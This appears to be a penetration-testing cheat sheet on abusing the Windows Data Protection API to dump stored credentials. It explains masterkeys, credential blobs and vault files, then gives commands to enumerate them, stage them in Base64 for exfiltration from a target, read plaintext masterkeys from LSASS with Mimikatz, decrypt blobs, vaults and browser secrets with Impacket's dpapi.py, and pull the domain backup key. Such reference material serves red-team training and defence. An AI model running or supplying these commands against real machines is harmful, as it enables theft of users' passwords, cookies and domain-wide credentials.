DPAPI ABUSE

PRIMARY CATEGORY → WINDOWS PRIVESC  •  WINDOWS CREDENTIALS DUMPING

Theory

DPAPI → Windows Data Protection API

It implements a Symmetric Cypher to encrypt credentials before store them here

These credentials are stored in the form of Blobs or VCRD files

Important

Note that Blobs are encrypted directly by the Data Protection API (DPAPI) using the User’s Masterkey

While .VCRD files are encrypted with the VEK (Vaul Encryption Key) and the VEK, in turn, is encrypted by DPAPI using the User’s masterkey

Zoom in

The Windows Credential Manager is the API/Interface where a user can view as entries the information related to the data contained within the Blobs and VCRD files

Therefore, the following elements stand out →

Masterkey

System File Attribute Enabled

Format (GUID - 256 Bits) → 36 Hex Chars e.g. cc6eb538-28f1-4ab4-adf2-f5594e88f0b2

Symmetric Encryption Key randomly generated the first time a user logs in to a system

Usually, there is one per Logon Session i.e., one per user, at least until the user’s password is changed

This masterkey is used by the Data Protection API (DPAPI) to encrypt data such as →

• Blobs
• .VPOL Files
• Credentials (Chrome, OneDrive…)

In turn, this Masterkey is also stored encrypted

To encrypt it, a Windows system can use the following objects →

• A key derived from the local/domain user account password

Masterkey encrypted using a key derived from the User’s password by applying a PBKDF2 with SHA1 or SHA512, depending on the version of the Windows System

• Domain Backup Key

Regarding to domain user accounts, theMasterkey is encrypted using either the Backup Key generated by the DC or a key derived from the user account password

• System Keys

Machine Keys

Storage Path

%APPDATA%\Microsoft\Protect

Credential File

System File Attribute enabled

BLOB

Format → 32 Hex Chars e.g. 85E671988F9A2D1981A4B6791F9A4EE8

This Binary Long Object contains the encrypted user credentials in a binary format

It is directly encrypted by the Data Protection API (DPAPI) using the User’s masterkey

This type of file is not part of the modern Windows Credential Locker (Windows Vault)

This is the classic storage method of storing the user’s secrets → Credential Blob encrypted by DPAPI

• Storage Path 📦

%APPDATA%\Microsoft\Credentials
%LOCALAPPDATA%\Microsoft\Credentials

Vault Credential Record - VCRD

VCRD → Vault Credentials

Format → 40 Hex Chars followed by the .VCRD Extension e.g. EAF37DD1613D6D42430ADCF4345504EF6A30EF4F.vcrd

Structure

Vault\  
	<VAULT_GUID>\  
		Policy.vpol  
		test.vcrd  
		test.vsch

It also contains the encrypted user secrets

The .VCRD file is encrypted with the VEK (Vault Encryption Key) of the .VPOL file

And the .VPOL file, containing the VEK, is encrypted by the Data Protection API (DPAPI) using the User’s masterkey

That is, there is a Double Encryption →

• .VCRD File encrypted with .VPOL’s VEK

• .VPOL File encrypted by DPAPI with the User’s masterkey

This type of file, along with .VPOL, is part of the modern Windows Credential Locker (Windows Vault)

• Storage Path 📦

%APPDATA%\Microsoft\Vault
%LOCALAPPDATA%\Microsoft\Vault

---

Masterkeys & Credentials Files Storage Path

These object are usually stored in the following paths →

User Masterkeys

Path

%APPDATA%\Microsoft\Protect\<SID>\

i.e.

C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<SID>\

Content

There we can find →

<GUID_MASTERKEY> # Encrypted Masterkey File
Preferred # Current Preferred Masterkey
CREDHIST # Old Password Management
BK-<DOMAIN> # Domain Backup Key

System Masterkeys

Machine Masterkeys

Path

C:\Windows\System32\Microsoft\Protect\S-1-5-18\ # Especially Important
C:\Windows\System32\Microsoft\Protect\S-1-5-19\
C:\Windows\System32\Microsoft\Protect\S-1-5-20\

To decrypt machine secrets, we will also need SECURITY and SYSTEM resources

Microsoft Credential Manager

Credential Files

Encrypted Blobs

%APPDATA%\Microsoft\Credentials
%LOCALAPPDATA%\Microsoft\Credentials

i.e.

C:\Users\<USER>\AppData\Roaming\Microsoft\Credentials\  
C:\Users\<USER>\AppData\Local\Microsoft\Credentials\

Content

RDP Saved Credentials
TERMSRV/<HOST>
Generic Credentials
Network Credentials
Application Credentials
Microsoft Account
Domain Password
Domain Certificate

Windows Vault

Related to Windows Credential Lockers (Windows Vaults)

Path

%APPDATA%\Microsoft\Vault
%LOCALAPPDATA%\Microsoft\Vault

i.e.

C:\Users\<USER>\AppData\Roaming\Microsoft\Vault\
C:\Users\<USER>\AppData\Local\Microsoft\Vault\

Content

Vault\  
	<VAULT_GUID>\  
		Policy.vpol  
		<FILE>.vcrd  
		<FILE>.vsch

Browser Credentials

Chrome

%LOCALAPPDATA%\Google\Chrome\User Data\Local State  
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data  
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Cookies

Edge

%LOCALAPPDATA%\Microsoft\Edge\User Data\Local State
%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Login Data
%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Cookies

Brave

%LOCALAPPDATA%\BraveSoftware\Brave-Browser\User Data\Local State
%LOCALAPPDATA%\BraveSoftware\Brave-Browser\User Data\Default\Login Data
%LOCALAPPDATA%\BraveSoftware\Brave-Browser\User Data\Default\Cookies

Opera

%APPDATA%\Opera Software\Opera Stable\Local State
%APPDATA%\Opera Software\Opera Stable\Login Data
%APPDATA%\Opera Software\Opera Stable\Cookies

---

List Stored Credentials

Credential Manager

GUI needed

Logon Type → 2 (Interactive) or 10 (RemoteInteractive)

control.exe /name Microsoft.CredentialManager

Zoom In

cmdkey.exe

Logon Type → 2, 3 (Network) or 10

cmdkey.exe /list

---

Run a Command with Stored Credentials

Runas.exe

To Run any program with the above stored credentials →

A Logon Session Type 2 (Interactive) is created with runas.exe if the /netonly parameter is not specified

runas.exe /savecred /user:<USER> <COMMAND>

.lnk Files Enumeration

Usually, runas.exe is used within .lnk files ( i.e. Shortcuts )

To enumerate all the accesible .lnk files in the Target →

Target

Get-ChildItem -Path "C:\" -Recurse -Force -Filter *.lnk |
ForEach-Object {
	$Match = Get-Content -Path $_.FullName |
	Select-String -Pattern '.*runas.*'
	if ($Match){
		Write-Output "`nFile: $($_.FullName)`n`n $($Match)"
	}
}

Oneliner

Get-ChildItem -Path "C:\" -Recurse -Force -Filter *.lnk | % { $Match = Get-Content -Path $_.FullName | Select-String -Pattern '.*runas.*' ; if ($Match){ Write-Output "`nFile: $($_.FullName)`n`n $($Match)" } }

.lnk Information Extraction

$WScript = New-Object -COMObject WScript.Shell
$SC = Get-Item '<FILE>'
$WScript.CreateShortcut($SC.FullName)

Oneliner

(New-Object -COMObject WScript.Shell).CreateShortcut((Get-Item 'FILE').FullName)

---

Masterkeys & Credentials Files Enumeration

Powershell

Declare an Array with the above Paths as its elements

$Paths = @(
	"C:\Users\<USER>\AppData\Local\Microsoft\Vault",
	"C:\Users\<USER>\AppData\Local\Microsoft\Protect",
	"C:\Users\<USER>\AppData\Local\Microsoft\Credentials",
	"C:\Users\<USER>\AppData\Roaming\Microsoft\Vault",
	"C:\Users\<USER>\AppData\Roaming\Microsoft\Protect",
	"C:\Users\<USER>\Appdata\Roaming\Microsoft\Credentials"
)

Recursive search and Filtering through these elements

$Paths | % {
	Get-ChildItem -Path $_ -Recurse -Force -ErrorAction SilentlyContinue |
	Where-Object { 
		$_.Attributes -Match 'System' -and -not ($_.PSisContainer)
	} | % { $_.FullName }
}

Oneliner

$Paths | % { Get-ChildItem -Path $_ -Recurse -Force -ErrorAction SilentlyContinue | Where-Object { $_.Attributes -Match 'System' -and -not ($_.PSisContainer) } | % { $_.FullName } }

PS v3.0 >

$Paths | ForEach-Object {
	Get-ChildItem -Path $PSItem -Recurse -Force -Attributes !Directory,System -ErrorAction SilentlyContinue | % { $_.FullName }
}

Oneliner

$Paths | ForEach-Object { Get-ChildItem -Path $PSItem -Recurse -Force -Attributes !Directory,System -ErrorAction SilentlyContinue | % { $_.FullName } }

Or All-In-One directly →

Get-ChildItem -Path "C:\Users\<USER>\Appdata\Local\Microsoft", "C:\Users\<USER>\Appdata\Roaming\Microsoft" -Recurse -Force -ErrorAction SilentlyContinue |
Where-Object { $_.Name -match '(vault|credentials|protect)$' } | % {
		Get-ChildItem -Path $_.FullName -Recurse -Force -ErrorAction SilentlyContinue |
		Where-Object {
			$_.Attributes -match 'System' -and -not $($_.PSIsContainer)
			} | % { "`n$($_.FullName)" }
		}

Oneliner

Get-ChildItem -Path "C:\Users\<USER>\Appdata\Local\Microsoft", "C:\Users\<USER>\Appdata\Roaming\Microsoft"  -Recurse -Force -ErrorAction SilentlyContinue | Where-Object { $_.Name -match '(vault|credentials|protect)$' } | % { Get-ChildItem -Path $_.FullName -Recurse -Force -ErrorAction SilentlyContinue | Where-Object { $_.Attributes -match 'System' -and -not $($_.PSIsContainer) } | % { "`n$($_.FullName)" } }

PS v3.0 >

Get-ChildItem -Path "C:\Users\<USER>\Appdata\Local\Microsoft", "C:\Users\<USER>\Appdata\Roaming\Microsoft" -Directory -Recurse -Force -ErrorAction SilentlyContinue |
Where-Object { $_.Name -match '(vault|credentials|protect)$' } |
% {
	Get-ChildItem -Path $_.FullName -Recurse -Force -ErrorAction SilentlyContinue -Attributes !Directory,System | % { $_.FullName }
}

Oneliner

Get-ChildItem -Path "C:\Users\<USER>\Appdata\Local\Microsoft", "C:\Users\<USER>\Appdata\Roaming\Microsoft" -Directory -Recurse -Force -ErrorAction SilentlyContinue | Where-Object { $_.Name -match '(vault|credentials|protect)$' } | % { Get-ChildItem -Path $_.FullName -Recurse -Force -ErrorAction SilentlyContinue -Attributes !Directory,System | % { $_.FullName } }

CMD

cmd /c "dir /S /AS C:\Users\<USER>\AppData\Local\Microsoft\Vault & dir /S /AS C:\Users\<USER>\AppData\Local\Microsoft\Credentials & dir /S /AS C:\Users\<USER>\AppData\Local\Microsoft\Protect & dir /S /AS C:\Users\<USER>\AppData\Roaming\Microsoft\Vault & dir /S /AS C:\Users\<USER>\AppData\Roaming\Microsoft\Credentials & dir /S /AS C:\Users\<USER>\AppData\Roaming\Microsoft\Protect"

---

Masterkeys and Credentials Files Exfiltration

Base64

From the Target 🎯

To convert to Base64 a File Content

Powershell (.NET)

[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("<FILE_FULL_PATH>"))

Certutil.exe

certutil.exe -encode <INPUT_FILE> <OUTPUT_FILE>

Therefore, to Convert the Content of all the Masterkeys and File Credentials to Base64

Get-ChildItem -Path "C:\Users\<USER>\Appdata\Local\Microsoft", "C:\Users\<USER>\Appdata\Roaming\Microsoft"  -Recurse -Force -ErrorAction SilentlyContinue |
Where-Object { $_.Name -match '(vault|credentials|protect)$' } |
% {
	Get-ChildItem -Path $_.FullName -Recurse -Force -ErrorAction SilentlyContinue |
	Where-Object {
		$_.Attributes -match 'System' -and -not $($_.PSIsContainer)
	} |
	% {
		Write-Output "`nFile -> $($_.FullName)`n`n Base64 Content -> `n`n$([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes($_.FullName)))"
	}
}

Oneliner

Get-ChildItem -Path "C:\Users\<USER>\Appdata\Local\Microsoft", "C:\Users\<USER>\Appdata\Roaming\Microsoft"  -Recurse -Force -ErrorAction SilentlyContinue | Where-Object { $_.Name -match '(vault|credentials|protect)$' } | % { Get-ChildItem -Path $_.FullName -Recurse -Force -ErrorAction SilentlyContinue | Where-Object { $_.Attributes -match 'System' -and -not $($_.PSIsContainer) } | % { Write-Output "`nFile -> $($_.FullName)`n`n Base64 Content -> `n`n$([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes($_.FullName)))" } }

From the Attacker (Windows Machine) 🗡️

Decode those Base64 Strings and dump the content into a files with the same name as above

Powershell (.NET)

To decode a Base64 String and dump its content into a file

[System.IO.File]::WriteAllBytes('<FILE_NAME>', [System.Convert]::FromBase64String("<BASE64_STRING>"))

Thus, to Decode the Content of the Masterkeys and Credentials Files from Base64 to Bytes to a file →

Masterkey

[System.IO.File]::WriteAllBytes('0792c32e-48a5-4fe3-8b43-d93d64590580', [System.Convert]::FromBase64String("<BASE64_STRING>"))

Credential File

[System.IO.File]::WriteAllBytes('51AB168BE4BDB3A603DADE4F8CA81290', [System.Convert]::FromBase64String("<BASE64_STRING>"))

---

Exporting Windows Vault to .CRD Files

Rundll32.exe

rundll32 keymgr.dll,KRShowKeyMgr

Zoom In

---

Data Extraction with Mimikatz.exe

Live Data Extraction

Ref. I

Ref. II

The steps below follow the manual process of decrypting Users’ secrets stored in the form of Blobs or stored in the Windows Credential Locker, both on Disk

But, before proceed with them, if we log into any system as a Local Admin Account and we are able to launch a process with a High IL (Full Access Token), we can extract the Users’ secrets stored in the LSASS.exe’s memory space

Just proceed as follows →

.\mimikatz.exe 'privilege::debug' 'token::elevate' 'sekurlsa::credman' exit

Important

Note that sekurlsa::credman only reads the Active Logon Sessions on LSASS.exe

Therefore, it will only get the ones that were used recently and are stored in memory

To make sure that we collect all stored credentials, just follow the below steps

Local Admin Account

Masterkey encrypted with a Key derived from the User Password using PBKDF2-HMAC-SHA1 or SHA512

If an attacker logs on system as a Local Admin User, it is not necessary to decrypt the Masterkey by providing the User’s password

I.e., As a Local Admin User, a process launched with a Full Access Token has the required privileges in order to be able to access the LSASS.exe space memory

Important

Be aware that, on modern Windows System, several measures are usually implemented to prevent access to the LSASS.exe Memory Space from an arbitrary process

• Lsa Protection → LSASS.exe runs as a PPL (Protected Process Light)
• Credential Guard → LSAISO.exe runs in an Isolated Virtual Environment

Therefore, we could proceed as follows →

Plain Text Masterkey Extraction

RunAsPPL and Credential Guard disabled

To extract Plain Masterkeys of all users with an active logon session on the system →

.\mimikatz.exe 'privilege::debug' 'token::elevate' 'sekurlsa::dpapi' exit

Plain Text Credential Extraction

.\mimikatz.exe 'dpapi::cred /in:<CRED_FILE_PATH> /masterkey:<PLAIN_MASTERKEY_VALUE> /sid:<USER_SID>' exit

Local User Account - Non Privileged

Masterkey encrypted with a Key derived from the User Password using PBKDF2-HMAC-SHA1 or SHA512

GUID Masterkey Extraction

To extract a certain amount of information, such as the Masterkey GUID, related to the Credential File passed to Mimikatz as input →

.\mimikatz.exe 'dpapi::cred /in:<CRED_FILE_PATH> /sid:<USER_SID>' exit

Plain Text Masterkey Extraction

To extract the Plain Masterkey (Hex Value) proceed as follows →

.\mimikatz.exe 'dpapi::masterkey /in:<MASTERKEY_PATH> /sid:<USER_SID> /password:<USER_PASSWORD>' exit

Plain Text Credential Extraction

Once the Masterkey is extracted in plain text, simply use it to decrypt the Ciphered Credential File and obtain the stored credential in plain text

.\mimikatz.exe 'dpapi::cred /in:<CRED_FILE_PATH> /masterkey:<PLAIN_MASTERKEY_VALUE> /sid:<USER_SID>' exit

Domain User Account

Masterkey encrypted either using the DC’s Backup Key or a key derived from the given User account’s password

Same as a Local User Account

---

Offline Data Extraction - UNIX-Like

Masterkey

Protect\<SID>\<GUID_MASTERKEY>

Local/Domain User + Password

• Impacket’s DPAPI.py

dpapi.py masterkey -file '<MASTERKEY_FILE>' -sid '<USER_SID>' -password '<USER_PASSWD>'

Local/Domain User + NT Hash

• Impacket’s DPAPI.py

dpapi.py masterkey -file '<MASTERKEY_FILE>' -sid '<USER_SID>' -hashes ':<NT_HASH>'

Domain User + Domain Backup Key

• Impacket’s DPAPI.py

dpapi.py masterkey -file '<MASTERKEY_FILE>' -pvk '<DOMAIN_BACKUP_KEY>.pvk'

Local Machine + SYSTEM/SECURITY

• Impacket’s DPAPI.py

dpapi.py masterkey -file '<MASTERKEY_FILE>' -system '<SYSTEM>' -security '<SECURITY>'

Microsoft Credential Manager

Credential Files

Encrypted Blobs

%APPDATA%\Microsoft\Credentials\<BLOB>
%LOCALAPPDATA%\Microsoft\Credentials\<BLOB>

Extracting Information about the Encrypted Credential

e.g. Which Masterkey was used to encrypt the object

• Impacket’s DPAPI.py

dpapi.py credential -file '<MASTERKEY_FILE>'

Decrypting using the corresponding decrypted Masterkey

• Impacket’s DPAPI.py

dpapi.py credential -file '<MASTERKEY_FILE>' -key '<DECRYPTED_MASTERKEY>'

Windows Vault

Related to Windows Credential Lockers (Windows Vaults)

Both Policy.vpol and .vcrd files

First we must decrypt the Policy.vpol resource, using the decrypted masterkey, as it contains the Vault Encryption Key ( VEK ), which is used to encrypt the existing VCRD resources ( secrets ) within the given Windows Vault

Decrypting Policy.VPOL

i.e. Vault Encryption Key ( VEK ) Extraction

• Impacket’s DPAPI.py

dpapi.py vault -vpol '<POLICY_VPOL_FILE>' -key '<DECRYPTED_MASTERKEY>'

Decrypting VCRD

i.e. Secrets Extraction

• Impacket’s DPAPI.py

dpapi.py vault -vcrd '<VCRD_FILE>' -key '<VAULT_ENCRYPTION_KEY>'

Generic DPAPI Blobs

e.g.

• Chrome/Edge/Brave Local State Encrypted_key
• DPAPI Blobs extracted from JSON/XML/SQLite
• PSCredential Objects
• Any software using CryptProtectData()

Extracting Information about the Encrypted Credential

• Impacket’s DPAPI.py

dpapi.py unprotect -file '<BLOB_FILE>'

Decrypting

• Impacket’s DPAPI.py

dpapi.py unprotect -file '<BLOB_FILE>' -key '<DECRYPTED_MASTERKEY>'

Decrypting with Entropy

• Impacket’s DPAPI.py

dpapi.py unprotect -file '<BLOB_FILE>' -key '<DECRYPTED_MASTERKEY>' -entropy '<OPTIONAL_ENTROPY>'

Credhist

User Credential History

%APPDATA%\Microsoft\Protect\<SID>\CREDHIST

Decrypting

• Impacket’s DPAPI.py

dpapi.py credhist -file '<CREDHIST_FILE>' -password '<USER_PASSWD>'

Domain Backup Key

This domain key allows any advesary to retrieve all DPAPI Masterkeys for all domain user accounts

Extracting the Domain Backup Key

i.e. a .PVK file

• Impacket’s DPAPI.py

dpapi.py backupkeys '<DOMAIN>/<USER>:<PASSWD>@<DC>'

Decrypting any Domain User Masterkey

• Impacket’s DPAPI.py

dpapi.py masterkey -file '<MASTERKEY_FILE>' -pvk '<DOMAIN_BACKUP_KEY>'

Offline Data Extraction - Windows

🛠️⌛

See SharpDPAPI

SharpDPAPI.exe machinemasterkeys
SharpDPAPI.exe machinecredentials
SharpDPAPI.exe machinevaults
SharpDPAPI.exe triage

---

Resources

Insecurity: DPAPI in depth